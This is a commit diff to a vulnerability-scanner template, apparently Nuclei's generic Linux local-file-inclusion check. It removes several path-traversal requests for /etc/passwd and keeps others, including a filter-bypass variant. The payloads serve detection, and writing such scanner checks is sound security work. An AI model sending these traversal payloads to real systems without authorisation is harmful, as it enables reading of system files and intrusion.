Update generic-linux-lfi.yaml
parent
5e0f3a4229
commit
f0d0eff9ca
|
@ -47,12 +47,6 @@ requests:
|
|||
- "{{BaseURL}}/index.php?page=../../etc/passwd"
|
||||
- "{{BaseURL}}/index.php?page=....//....//etc/passwd"
|
||||
- "{{BaseURL}}/../../../../../../../../../etc/passwd"
|
||||
- "{{BaseURL}}/../../../../../../../../etc/passwd"
|
||||
- "{{BaseURL}}/../../../../../../../etc/passwd"
|
||||
- "{{BaseURL}}/../../../../../../etc/passwd"
|
||||
- "{{BaseURL}}/../../../../../etc/passwd"
|
||||
- "{{BaseURL}}/../../../../etc/passwd"
|
||||
- "{{BaseURL}}/../../../etc/passwd"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
|
|
Loading…
Reference in New Issue